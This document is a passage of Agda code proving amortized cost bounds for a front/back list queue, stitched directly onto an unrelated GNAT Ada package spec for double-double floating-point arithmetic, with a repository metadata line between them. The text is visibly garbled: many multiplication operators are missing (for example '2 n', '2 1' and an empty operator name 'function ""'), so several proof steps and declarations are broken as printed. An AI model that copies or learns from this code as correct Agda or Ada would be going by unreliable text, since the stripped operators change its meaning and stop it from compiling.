enq q x (op/deq) operate q = bind (F Q) (deq q) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q)) -- o operateϕ q is morally ϕ (o operate q), which doesn't type-check since o operate q is a computation. -- Easier to work with than bind cost (o operate q) ϕ (but they are equivalent, as shown below). _operateϕ_ : op → val Q → ℂ (op/enq x) operateϕ (f , b) = len f + 2 * (1 + len b) (op/deq) operateϕ (f , b) = list/match f (λ _ → cost) (list/match b (λ _ → cost) 0 (λ _ b' → len b')) (λ _ f' → len f' + 2 * len b) operateϕ≡ϕ∘operate : ∀ o q → ◯ (o operateϕ q ≡ bind cost (o operate q) ϕ) operateϕ≡ϕ∘operate (op/enq x) (f , b) u = begin len f + 2 * (1 + len b) ≡˘⟨ cong (λ n → len f + 2 * n) (step/ext cost (1 + len b) 1 u) ⟩ len f + 2 * step cost 1 (1 + len b) ≡⟨⟩ bind cost (enq (f , b) x) ϕ ∎ where open ≡-Reasoning operateϕ≡ϕ∘operate op/deq (f , b) u = list/match f (λ f → meta ((op/deq operateϕ (f , b)) ≡ bind cost (op/deq operate (f , b)) ϕ)) (list/ind b (λ b → meta ((op/deq operateϕ (nil , b)) ≡ bind cost (op/deq operate (nil , b)) ϕ)) refl λ a l ih → emp/cons a l) λ a l → refl where emp/cons : ∀ a l → op/deq operateϕ (nil , cons a l) ≡ bind cost (op/deq operate (nil , cons a l)) ϕ emp/cons a l with rev/lemma/cons a l u ... \| (x' , l' , eqn1 , eqn2) = begin op/deq operateϕ (nil , cons a l) ≡⟨⟩ step cost 1 (len l) ≡⟨ step/ext cost (len l) 1 u ⟩ len l ≡⟨ P.sym eqn1 ⟩ len l' ≡⟨ P.sym (+-identityʳ (len l')) ⟩ len l' + 0 ≡⟨⟩ len l' + 2 * len nil ≡⟨⟩ ϕ (l' , nil) ≡˘⟨ step/ext cost (ϕ (l' , nil)) 1 u ⟩ step cost 1 (ϕ (l' , nil)) ≡⟨⟩ bind cost (step (F Q) 1 (ret (l' , nil))) ϕ ≡⟨⟩ bind cost (bind (F Q) (step (F deq-tp) 1 (ret (inj₂ ((l' , nil) , x')))) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡⟨⟩ bind cost (bind (F Q) (deq/emp (cons x' l')) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡˘⟨ cong (λ e → bind cost (bind (F Q) e λ l' → bind (F Q) (deq/emp l') λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ) eqn2 ⟩ bind cost (bind (F Q) (rev (cons a l)) λ l' → bind (F Q) (deq/emp l') λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡⟨⟩ bind cost (bind (F Q) (deq (nil , cons a l)) λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))) ϕ ≡⟨⟩ bind cost (op/deq operate (nil , cons a l)) ϕ ∎ where open ≡-Reasoning -- op/cost o q is the cost of o operate q. op/cost : op → val Q → ℕ op/cost (op/enq x) q = 0 op/cost (op/deq) (f , b) = list/match f (λ _ → cost) (list/match b (λ _ → cost) 0 (λ _ b' → 2 + len b')) (λ _ _ → 1) deq/cost≡cost/deq : ∀ q → ◯ (deq/cost/closed q ≡ op/cost op/deq q) deq/cost≡cost/deq (f , b) u = P.cong (λ x → list/match f (λ _ → cost) x (λ _ _ → 1)) ( list/match b (λ b → meta (list/match b (λ _ → cost) 0 (λ _ b' → 1 + len b) ≡ list/match b (λ _ → cost) 0 (λ _ b' → 2 + len b'))) refl (λ a l → let open ≡-Reasoning in begin list/match (cons a l) (λ _ → cost) 0 (λ _ b' → 1 + len (cons a l)) ≡⟨⟩ step cost 1 (1 + len (cons a l)) ≡⟨ step/ext cost (1 + len (cons a l)) 1 u ⟩ 1 + len (cons a l) ≡⟨⟩ 1 + step cost 1 (suc (len l)) ≡⟨ cong (1 +_) (step/ext cost (suc (len l)) 1 u) ⟩ 2 + len l ≡˘⟨ step/ext cost (2 + len l) 1 u ⟩ step cost 1 (2 + len l) ≡⟨⟩ list/match (cons a l) (λ _ → cost) 0 (λ _ b' → 2 + len b') ∎ ) ) -- cost o q upperbounds the cost of o operate q. op≤op/cost : ∀ o q → IsBounded Q (o operate q) (op/cost o q) op≤op/cost (op/enq x) q = enq≤enq/cost q x op≤op/cost op/deq q rewrite P.sym (+-identityʳ (op/cost (op/deq) q)) = bound/bind/const {A = deq-tp} {e = deq q} {f = λ s → (sum/case unit (Σ++ Q λ _ → A) (λ _ → F Q) s (λ _ → ret (nil , nil)) (λ (q , x) → ret q))} (op/cost op/deq q) 0 (bound/relax (λ u → ≤-reflexive (deq/cost≡cost/deq q u)) (deq≤deq/cost/closed q)) λ a → bound/sum/case/const/const unit ((Σ++ Q λ _ → A)) (λ _ → Q) a ((λ _ → ret (nil , nil))) (λ (q , x) → ret q) 0 (λ _ → bound/ret) (λ _ → bound/ret) -- is/acost o k when for any state q, k suffices for the cost of o on q and the difference in the potential. is/acost : op → ℕ → Set is/acost o k = ∀ q → (Int.+ (op/cost o q)) Int.+ ((o operateϕ q) Int.⊖ (ϕ q)) Int.≤ Int.+ k acost/weaken : ∀ {m n o} → m ≤ n → is/acost o m → is/acost o n acost/weaken h1 h2 = λ q → IntP.≤-trans (h2 q) (Int.+≤+ h1) -- A sequence of operations induces a single computation by threading through the initial state q0. _op/seq_ : List op → val Q → cmp (F Q) [] op/seq q0 = ret q0 (o ∷ os) op/seq q = bind (F Q) (o operate q) λ q' → os op/seq q' op/seq/cost : ∀ (l : List op) → val Q → ℂ op/seq/cost [] q0 = 0 op/seq/cost (o ∷ os) q = bind cost (o operate q) λ q' → op/cost o q + op/seq/cost os q' -- Cost of a sequence computation is bounded by the sum of cost of the constituents. op/seq≤op/seq/cost : ∀ l q → IsBounded Q (l op/seq q) (op/seq/cost l q) op/seq≤op/seq/cost [] q0 = bound/ret op/seq≤op/seq/cost (o ∷ os) q = bound/bind {A = Q} {e = o operate q} {f = λ q → os op/seq q} (op/cost o q) (op/seq/cost os) (op≤op/cost o q) λ q → op/seq≤op/seq/cost os q -- Telescoping the potential. op/seq/cost/tele : ∀ (l : List op) → val Q → Int.ℤ op/seq/cost/tele [] q0 = Int.0ℤ op/seq/cost/tele (o ∷ os) q = bind (meta Int.ℤ) (o operate q) λ q' → (Int.+ (op/cost o q)) Int.+ (o operateϕ q Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q') ϕn : ℕ → List op → val Q → ℕ ϕn zero l q0 = ϕ q0 ϕn (suc n) (o ∷ os) q = bind cost (o operate q) λ q' → ϕn n os q' ϕn (suc n) [] q = 0 -- Potential of the initial state ϕ/0 : List op → val Q → ℕ ϕ/0 l = ϕn 0 l -- Potential of the final state ϕ/-1 : List op → val Q → ℕ ϕ/-1 l = ϕn (length l) l bind/dup : ∀ A 𝕊 𝕋 e f (g : val A → 𝕊 → 𝕋) → bind {A} (meta 𝕋) e (λ a → g a (bind {A} (meta 𝕊) e f)) ≡ bind {A} (meta 𝕋) e (λ a → g a (f a)) bind/dup A 𝕊 𝕋 e f g = begin bind (meta 𝕋) e (λ a → g a (bind (meta 𝕊) e f)) ≡⟨ P.cong (λ h → bind (meta 𝕋) e h) (funext (λ a → bind/meta A 𝕊 𝕋 e f (λ s → g a s))) ⟩ bind (meta 𝕋) e (λ a → bind (meta 𝕋) e (λ a' → g a (f a'))) ≡⟨ bind/idem A 𝕋 e (λ a a' → g a (f a')) ⟩ bind (meta 𝕋) e (λ a → g a (f a)) ≡⟨ refl ⟩ bind (meta 𝕋) e (λ a → g a (f a)) ∎ where open ≡-Reasoning -- Telescoping sum: -- Σᵢⁿ op/cost oᵢ + ϕ qᵢ - ϕ qᵢ₋₁ = ϕ q_{n-1} - ϕ q_0 + Σᵢ costᵢ cost≡cost/tele : ∀ l q → ◯ (op/seq/cost/tele l q ≡ (ϕ/-1 l q Int.⊖ ϕ/0 l q) Int.+ (Int.+ (op/seq/cost l q))) cost≡cost/tele [] q u = P.sym ( begin (ϕ q Int.⊖ ϕ q) Int.+ (Int.+ 0) ≡⟨ IntP.+-identityʳ (ϕ q Int.⊖ ϕ q) ⟩ ϕ q Int.⊖ ϕ q ≡⟨ IntP.n⊖n≡0 (ϕ q) ⟩ Int.+ 0 ≡⟨ refl ⟩ Int.+ 0 ∎ ) where open ≡-Reasoning cost≡cost/tele (o ∷ os) q u rewrite operateϕ≡ϕ∘operate o q u \| bind/meta Q ℕ Int.ℤ (o operate q) (λ q' → op/cost o q + op/seq/cost os q') (λ x → (ϕ/-1 (o ∷ os) q Int.⊖ ϕ/0 (o ∷ os) q) Int.+ (Int.+ x)) \| bind/dup Q ℕ Int.ℤ (o operate q) (ϕ/-1 os) (λ q' x → (x Int.⊖ ϕ q) Int.+ (Int.+ (op/cost o q + op/seq/cost os q'))) \| bind/dup Q ℕ Int.ℤ (o operate q) ϕ (λ q' x → Int.+ (op/cost o q) Int.+ (x Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q')) = P.cong (λ f → bind (meta Int.ℤ) (o operate q) f) (funext (λ q' → ( begin (Int.+ (op/cost o q)) Int.+ (ϕ q' Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q') ≡⟨ P.cong (λ x → (Int.+ (op/cost o q)) Int.+ (ϕ q' Int.⊖ ϕ q) Int.+ x) (cost≡cost/tele os q' u) ⟩ Int.+ op/cost o q Int.+ (ϕ q' Int.⊖ ϕ q) Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q')) (IntP.+-comm (Int.+ op/cost o q) (ϕ q' Int.⊖ ϕ q)) ⟩ ϕ q' Int.⊖ ϕ q Int.+ Int.+ op/cost o q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q') ≡⟨ IntP.+-assoc (ϕ q' Int.⊖ ϕ q) (Int.+ op/cost o q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q') ⟩ ϕ q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/seq/cost os q')) ≡⟨ P.cong (λ x → ϕ q' Int.⊖ ϕ q Int.+ x) (P.sym (IntP.+-assoc (Int.+ op/cost o q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q') (Int.+ op/seq/cost os q'))) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → ϕ q' Int.⊖ ϕ q Int.+ (x Int.+ Int.+ op/seq/cost os q')) (IntP.+-comm (Int.+ op/cost o q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q')) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → ϕ q' Int.⊖ ϕ q Int.+ x) (IntP.+-assoc (ϕ/-1 os q' Int.⊖ ϕ/0 os q') (Int.+ op/cost o q) (Int.+ op/seq/cost os q')) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q' Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) ≡⟨ P.sym (IntP.+-assoc (ϕ q' Int.⊖ ϕ q) (ϕ/-1 os q' Int.⊖ ϕ/0 os q') (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) ⟩ ϕ q' Int.⊖ ϕ q Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (P.sym (IntP.m-n≡m⊖n (ϕ q') (ϕ q))) ⟩ Int.+ ϕ q' Int.- (Int.+ ϕ q) Int.+ (ϕ/-1 os q' Int.⊖ ϕ/0 os q') Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → Int.+ ϕ q' Int.- (Int.+ ϕ q) Int.+ x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (P.sym (IntP.m-n≡m⊖n (ϕ/-1 os q') (ϕ/0 os q'))) ⟩ Int.+ ϕ q' Int.- Int.+ ϕ q Int.+ (Int.+ ϕ/-1 os q' Int.- (Int.+ ϕ/0 os q')) Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (IntP.+-comm (Int.+ ϕ q' Int.- Int.+ ϕ q) (Int.+ ϕ/-1 os q' Int.- (Int.+ ϕ/0 os q'))) ⟩ Int.+ ϕ/-1 os q' Int.- Int.+ ϕ/0 os q' Int.+ (Int.+ ϕ q' Int.- Int.+ ϕ q) Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (IntP.+-minus-telescope (Int.+ ϕ/-1 os q') (Int.+ ϕ q') (Int.+ ϕ q)) ⟩ Int.+ ϕ/-1 os q' Int.- Int.+ ϕ q Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ P.cong (λ x → x Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q')) (IntP.m-n≡m⊖n (ϕ/-1 os q') (ϕ q )) ⟩ ϕ/-1 os q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ≡⟨ refl ⟩ ϕ/-1 os q' Int.⊖ ϕ q Int.+ (Int.+ op/cost o q Int.+ Int.+ op/seq/cost os q') ∎ ) )) where open ≡-Reasoning data Amortized : List op → List ℕ → Set where a/emp : Amortized [] [] a/cons : ∀ o k l l' → is/acost o k → Amortized l l' → Amortized (o ∷ l) (k ∷ l') amortized≥cost/tele : ∀ q0 l l' → Amortized l l' → Int.+ (lsum l') Int.≥ op/seq/cost/tele l q0 amortized≥cost/tele q .[] .[] a/emp = IntP.≤-refl amortized≥cost/tele q .(o ∷ os) .(k ∷ l') (a/cons o k os l' x h) rewrite tbind/meta Q Int.ℤ (o operate q) (λ q' → (Int.+ (op/cost o q)) Int.+ (o operateϕ q Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q')) (λ z → z Int.≤ Int.+ lsum (k ∷ l')) = dbind (λ q' → meta ((Int.+ (op/cost o q)) Int.+ (o operateϕ q Int.⊖ ϕ q) Int.+ (op/seq/cost/tele os q') Int.≤ Int.+ lsum (k ∷ l'))) (o operate q) λ q' → begin Int.+ op/cost o q Int.+ ((o operateϕ q) Int.⊖ ϕ q) Int.+ op/seq/cost/tele os q' ≤⟨ IntP.+-monoˡ-≤ (op/seq/cost/tele os q') (x q) ⟩ Int.+ k Int.+ op/seq/cost/tele os q' ≤⟨ IntP.+-monoʳ-≤ (Int.+ k) (amortized≥cost/tele q' os l' h) ⟩ Int.+ k Int.+ Int.+ lsum l' ≤⟨ IntP.≤-refl ⟩ Int.+ k Int.+ Int.+ lsum l' ∎ where open IntP.≤-Reasoning -- Sum of a sequence of amortized costs (plus the initial potential) bounds the sum of the sequence of actual costs amortized≥cost : ∀ q l l' → Amortized l l' → ◯ (Int.+ (ϕ q + lsum l') Int.≥ Int.+ (op/seq/cost l q)) amortized≥cost q l l' h u = begin Int.+ (op/seq/cost l q) ≤⟨ IntP.n≤m+n (0 + ϕ/-1 l q) ⟩ Int.0ℤ Int.+ (Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → x Int.+ (Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q) (P.sym (IntP.n⊖n≡0 (ϕ q))) ⟩ ϕ q Int.⊖ ϕ q Int.+ Int.+ ϕ/-1 l q Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → x Int.+ (Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q) (P.sym (IntP.m-n≡m⊖n (ϕ q) (ϕ q))) ⟩ Int.+ ϕ q Int.+ Int.- (Int.+ ϕ q) Int.+ Int.+ ϕ/-1 l q Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → x Int.+ Int.+ op/seq/cost l q) (IntP.+-assoc (Int.+ ϕ q) (Int.- (Int.+ ϕ q)) (Int.+ ϕ/-1 l q)) ⟩ Int.+ ϕ q Int.+ (Int.- (Int.+ ϕ q) Int.+ Int.+ ϕ/-1 l q) Int.+ Int.+ op/seq/cost l q ≡⟨ P.cong (λ x → Int.+ ϕ q Int.+ x Int.+ Int.+ op/seq/cost l q) (IntP.+-comm (Int.- (Int.+ ϕ q)) (Int.+ ϕ/-1 l q)) ⟩ Int.+ ϕ q Int.+ (Int.+ ϕ/-1 l q Int.- (Int.+ ϕ q)) Int.+ Int.+ op/seq/cost l q ≡⟨ IntP.+-assoc (Int.+ ϕ q) (Int.+ ϕ/-1 l q Int.- (Int.+ ϕ q)) (Int.+ op/seq/cost l q) ⟩ Int.+ ϕ q Int.+ (Int.+ ϕ/-1 l q Int.- Int.+ ϕ q Int.+ Int.+ op/seq/cost l q) ≡⟨ P.cong (λ x → Int.+ ϕ q Int.+ (x Int.+ Int.+ op/seq/cost l q)) (IntP.m-n≡m⊖n (ϕ/-1 l q) (ϕ q)) ⟩ Int.+ ϕ q Int.+ (ϕ/-1 l q Int.⊖ ϕ q Int.+ Int.+ op/seq/cost l q) ≡⟨ P.cong (λ x → Int.+ ϕ q Int.+ x) (P.sym (cost≡cost/tele l q u)) ⟩ Int.+ ϕ q Int.+ op/seq/cost/tele l q ≤⟨ IntP.+-monoʳ-≤ (Int.+ ϕ q) (amortized≥cost/tele q l l' h) ⟩ Int.+ ϕ q Int.+ Int.+ lsum l' ≤⟨ IntP.≤-refl ⟩ Int.+ ϕ q Int.+ Int.+ lsum l' ∎ where open IntP.≤-Reasoning -- Amortized cost for enq and deq on a front-back queue enq/acost : ∀ x → ◯ (is/acost (op/enq x) 2) enq/acost x u (f , b) = begin (Int.+ (op/cost (op/enq x) (f , b))) Int.+ (((op/enq x) operateϕ (f , b)) Int.⊖ (ϕ (f , b))) ≡⟨⟩ Int.0ℤ Int.+ ((len f + 2 * (1 + len b)) Int.⊖ (ϕ (f , b))) ≡⟨ IntP.+-identityˡ ((len f + 2 * (1 + len b)) Int.⊖ (ϕ (f , b))) ⟩ len f + 2 * (1 + len b) Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → (len f + x) Int.⊖ (ϕ (f , b))) (-distribˡ-+ 2 1 (len b)) ⟩ len f + (2 1 + 2 * len b) Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → (len f + x) Int.⊖ (ϕ (f , b)) ) (+-comm 2 (2 * len b)) ⟩ len f + (2 * len b + 2) Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → x Int.⊖ (ϕ (f , b))) (P.sym (+-assoc (len f) (2 * len b) 2)) ⟩ len f + 2 * len b + 2 Int.⊖ ϕ (f , b) ≡⟨ P.cong (λ x → (len f + 2 * len b + 2) Int.⊖ x) (P.sym (+-identityʳ (ϕ (f , b)))) ⟩ len f + 2 * len b + 2 Int.⊖ (ϕ (f , b) + 0) ≡⟨ IntP.+-cancelˡ-⊖ (len f + 2 * len b) 2 0 ⟩ Int.+ 2 ∎ where open IntP.≤-Reasoning n+n≡2n : ∀ n → n + n ≡ 2 n n+n≡2n n = begin n + n ≡⟨ P.cong (λ x → n + x) (P.sym (+-identityʳ n)) ⟩ 2 n ∎ where open ≡-Reasoning deq/acost : ◯ (is/acost op/deq 0) deq/acost u (f , b) = list/match f (λ f → meta ((Int.+ (op/cost op/deq (f , b))) Int.+ ((op/deq operateϕ (f , b)) Int.⊖ (ϕ (f , b))) Int.≤ Int.0ℤ)) ( list/match b (λ b → meta ((Int.+ (op/cost op/deq (nil , b))) Int.+ ((op/deq operateϕ (nil , b)) Int.⊖ (ϕ (nil , b))) Int.≤ Int.0ℤ)) IntP.≤-refl λ a b' → begin (Int.+ (op/cost op/deq (nil , cons a b'))) Int.+ ((op/deq operateϕ (nil , cons a b')) Int.⊖ (ϕ (nil , cons a b'))) ≡⟨⟩ Int.+ (step cost 1 (2 + len b')) Int.+ (step cost 1 (len b') Int.⊖ (2 * (step cost 1 (1 + len b')))) ≡⟨ cong₂ Int._+_ (cong Int.+_ (step/ext cost (2 + len b') 1 u)) (cong₂ Int._⊖_ (step/ext cost (len b') 1 u) (cong (2 _) (step/ext cost (1 + len b') 1 u)) ) ⟩ Int.+ (2 + len b') Int.+ (len b' Int.⊖ (2 (1 + len b'))) ≡⟨ IntP.distribʳ-⊖-+-pos (2 + len b') (len b') (2 * (1 + len b')) ⟩ 2 + len b' + len b' Int.⊖ 2 * (1 + len b') ≡⟨ P.cong (λ x → x Int.⊖ 2 * (1 + len b')) (+-assoc 2 (len b') (len b')) ⟩ 2 + (len b' + len b') Int.⊖ 2 * (1 + len b') ≡⟨ P.cong (λ x → 2 + (len b' + len b') Int.⊖ x) (-distribˡ-+ 2 1 (len b')) ⟩ 2 + (len b' + len b') Int.⊖ (2 1 + 2 * len b') ≡⟨ P.cong (λ x → 2 + x Int.⊖ (2 + 2 * len b')) (n+n≡2n (len b')) ⟩ 2 + 2 len b' Int.⊖ (2 + 2 * len b') ≡⟨ IntP.n⊖n≡0 (2 + 2 * len b') ⟩ Int.0ℤ ∎ ) λ a f' → begin (Int.+ (op/cost op/deq (cons a f' , b))) Int.+ ((op/deq operateϕ (cons a f' , b)) Int.⊖ (ϕ (cons a f' , b))) ≡⟨⟩ Int.+ (step cost 1 1) Int.+ (step cost 1 (len f' + 2 * len b) Int.⊖ (step cost 1 (1 + len f') + 2 * len b)) ≡⟨ cong₂ Int._+_ (cong Int.+_ (step/ext cost 1 1 u)) (cong₂ Int._⊖_ (step/ext cost (len f' + 2 * len b) 1 u) (cong (_+ 2 * len b) (step/ext cost (1 + len f') 1 u)) ) ⟩ Int.+ 1 Int.+ ((len f' + 2 * len b) Int.⊖ (1 + len f' + 2 * len b)) ≡⟨ IntP.distribʳ-⊖-+-pos 1 (len f' + 2 * len b) (1 + len f' + 2 * len b) ⟩ 1 + (len f' + 2 * len b) Int.⊖ (1 + len f' + 2 * len b) ≡⟨ P.cong (λ x → x Int.⊖ (1 + len f' + 2 * len b)) (P.sym (+-assoc 1 (len f') (2 * len b))) ⟩ 1 + len f' + 2 * len b Int.⊖ (1 + len f' + 2 * len b) ≡⟨ IntP.n⊖n≡0 (1 + len f' + 2 * len b) ⟩ Int.0ℤ ∎ where open IntP.≤-Reasoning all2s : ℕ → List ℕ all2s n = tabulate {n = n} (λ _ → 2) sum2s : ∀ n → lsum (all2s n) ≡ 2 * n sum2s zero = refl sum2s (suc n) = begin 2 + lsum (all2s n) ≡⟨ P.cong (λ x → 2 + x) (sum2s n) ⟩ 2 + 2 * n ≡⟨ P.cong (λ x → x + 2 * n) (-identityʳ 2) ⟩ 2 1 + 2 * n ≡⟨ P.sym (-distribˡ-+ 2 1 n) ⟩ 2 (1 + n) ∎ where open ≡-Reasoning all2s/is/acost : ∀ l → ◯ (Amortized l (all2s (length l))) all2s/is/acost [] u = a/emp all2s/is/acost ((op/enq x) ∷ os) u = a/cons (op/enq x) 2 os (all2s (length os)) (enq/acost x u) (all2s/is/acost os u) all2s/is/acost (op/deq ∷ os) u = a/cons op/deq 2 os (all2s (length os)) (acost/weaken z≤n (deq/acost u)) (all2s/is/acost os u) op/seq/cost≤ϕ₀+2\|l\| : ∀ q l → ◯ (Int.+ (op/seq/cost l q) Int.≤ Int.+ (ϕ q + 2 length l)) op/seq/cost≤ϕ₀+2\|l\| q l u = begin Int.+ (op/seq/cost l q) ≤⟨ amortized≥cost q l (all2s (length l)) (all2s/is/acost l u) u ⟩ Int.+ (ϕ q + lsum (all2s (length l))) ≡⟨ P.cong (λ x → Int.+ (ϕ q + x)) (sum2s (length l)) ⟩ Int.+ (ϕ q + 2 length l) ≤⟨ IntP.≤-refl ⟩ Int.+ (ϕ q + 2 * length l) ∎ where open IntP.≤-Reasoning -- Starting with an empty queue, a sequence of n operations costs at most 2 * n op/seq≤2\|l\| : ∀ l → IsBounded Q (l op/seq emp) (2 length l) op/seq≤2\|l\| l = bound/relax (λ u → IntP.drop‿+≤+ (op/seq/cost≤ϕ₀+2\|l\| emp l u)) (op/seq≤op/seq/cost l emp)
bb-runtimes/runtimes/ravenscar-full-stm32g474/gnat/s-dourea.ads	JCGobbi/Nucleo-STM32G474RE	0	17191	<gh_stars>0 ------------------------------------------------------------------------------ -- -- -- GNAT COMPILER COMPONENTS -- -- -- -- S Y S T E M . D O U B L E _ R E A L -- -- -- -- S p e c -- -- -- -- Copyright (C) 2021, Free Software Foundation, Inc. -- -- -- -- GNAT is free software; you can redistribute it and/or modify it under -- -- terms of the GNU General Public License as published by the Free Soft- -- -- ware Foundation; either version 3, or (at your option) any later ver- -- -- sion. GNAT is distributed in the hope that it will be useful, but WITH- -- -- OUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY -- -- or FITNESS FOR A PARTICULAR PURPOSE. -- -- -- -- -- -- -- -- -- -- -- -- You should have received a copy of the GNU General Public License and -- -- a copy of the GCC Runtime Library Exception along with this program; -- -- see the files COPYING3 and COPYING.RUNTIME respectively. If not, see -- -- <http://www.gnu.org/licenses/>. -- -- -- -- GNAT was originally developed by the GNAT team at New York University. -- -- Extensive contributions were provided by Ada Core Technologies Inc. -- -- -- ------------------------------------------------------------------------------ -- This package contains routines for supporting floating-point computations -- in double precision, i.e. using a second number to estimate the error due -- to rounding and more generally performing computations with twice as many -- bits of mantissa. It is based on the Double-Double library available at -- https://www.davidhbailey.com/dhbsoftware written by <NAME> et al. generic type Num is digits <>; package System.Double_Real is pragma Pure; type Double_T is record Hi, Lo : Num; end record; function To_Double (N : Num) return Double_T is ((Hi => N, Lo => 0.0)); -- Convert a single to a double real function To_Single (D : Double_T) return Num is (D.Hi); -- Convert a double to a single real function Quick_Two_Sum (A, B : Num) return Double_T with Pre => A = 0.0 or else abs (A) >= abs (B); -- Compute A + B and its rounding error exactly, but assume \|A\| >= \|B\| function Two_Sum (A, B : Num) return Double_T; -- Compute A + B and its rounding error exactly function Two_Diff (A, B : Num) return Double_T; -- Compute A - B and its rounding error exactly function Two_Prod (A, B : Num) return Double_T; -- Compute A * B and its rounding error exactly function Two_Sqr (A : Num) return Double_T; -- Compute A * A and its rounding error exactly function "+" (A : Double_T; B : Num) return Double_T; function "-" (A : Double_T; B : Num) return Double_T; function "" (A : Double_T; B : Num) return Double_T; function "/" (A : Double_T; B : Num) return Double_T with Pre => B /= 0.0; -- Mixed precision arithmetic operations function "+" (A, B : Double_T) return Double_T; function "-" (A, B : Double_T) return Double_T; function "" (A, B : Double_T) return Double_T; function "/" (A, B : Double_T) return Double_T with Pre => B.Hi /= 0.0; -- Double precision arithmetic operations function Sqr (A : Double_T) return Double_T; -- Faster version of A * A function "=" (A : Double_T; B : Num) return Boolean is (A.Hi = B and then A.Lo = 0.0); function "<" (A : Double_T; B : Num) return Boolean is (A.Hi < B or else (A.Hi = B and then A.Lo < 0.0)); function "<=" (A : Double_T; B : Num) return Boolean is (A.Hi < B or else (A.Hi = B and then A.Lo <= 0.0)); function ">" (A : Double_T; B : Num) return Boolean is (A.Hi > B or else (A.Hi = B and then A.Lo > 0.0)); function ">=" (A : Double_T; B : Num) return Boolean is (A.Hi > B or else (A.Hi = B and then A.Lo >= 0.0)); -- Mixed precision comparisons function "=" (A, B : Double_T) return Boolean is (A.Hi = B.Hi and then A.Lo = B.Lo); function "<" (A, B : Double_T) return Boolean is (A.Hi < B.Hi or else (A.Hi = B.Hi and then A.Lo < B.Lo)); function "<=" (A, B : Double_T) return Boolean is (A.Hi < B.Hi or else (A.Hi = B.Hi and then A.Lo <= B.Lo)); function ">" (A, B : Double_T) return Boolean is (A.Hi > B.Hi or else (A.Hi = B.Hi and then A.Lo > B.Lo)); function ">=" (A, B : Double_T) return Boolean is (A.Hi > B.Hi or else (A.Hi = B.Hi and then A.Lo >= B.Lo)); -- Double precision comparisons generic type Uns is mod <>; function From_Unsigned (U : Uns) return Double_T; -- Convert Uns to Double_T generic type Uns is mod <>; function To_Unsigned (D : Double_T) return Uns with Pre => D >= 0.0; -- Convert Double_T to Uns with truncation end System.Double_Real;
